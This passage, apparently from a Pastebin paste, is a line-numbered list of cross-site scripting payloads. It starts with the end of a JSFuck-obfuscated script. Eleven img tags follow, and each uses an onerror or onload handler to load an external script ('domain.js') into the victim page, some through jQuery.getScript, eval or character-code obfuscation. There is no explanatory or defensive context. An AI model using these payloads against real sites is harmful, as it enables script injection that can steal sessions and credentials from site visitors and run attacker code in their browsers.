+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
  480. </script>
  481.  
  482.  
  483. <img src=x onerror=with(document)body.appendChild(document.createElement('script')).src="domain.js"></img>
  484. <img src=x onerror="with(document)body.appendChild(createElement('script')).src='domain.js'"></img>
  485. <img src=1 onerror=jQuery.getScript("domain.js")>
  486. <img src="#" onerror="$.getScript('domain.js')">
  487. <img src="#" onerror="var a=String.fromCharCode(47);$.getScript(a+a+'domain.sj'+a+'4091')">
  488. <img src='0' onerror=with(document)body.appendChild(createElement('script')).src='domain.js'>
  489. <img src="#" onload="s=document.createElement('script');s.src='domain.js'+Math.random();document.body.appendChild(s)" border="0">
  490. <img src=i onerror=eval(jQuery.getScript('domain.js'))>
  491. <img src=N onerror=eval(javascript:document.write(unescape(' <script src="domain.js"></script>'));)>
  492. <img src=x onerror=document.body.appendChild(document.createElement('script')).src='domain.js'>
  493. <img src=x onerror="with(document)body.appendChild(createElement('script')).src='domain.js'" width="0" height="0"></img>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top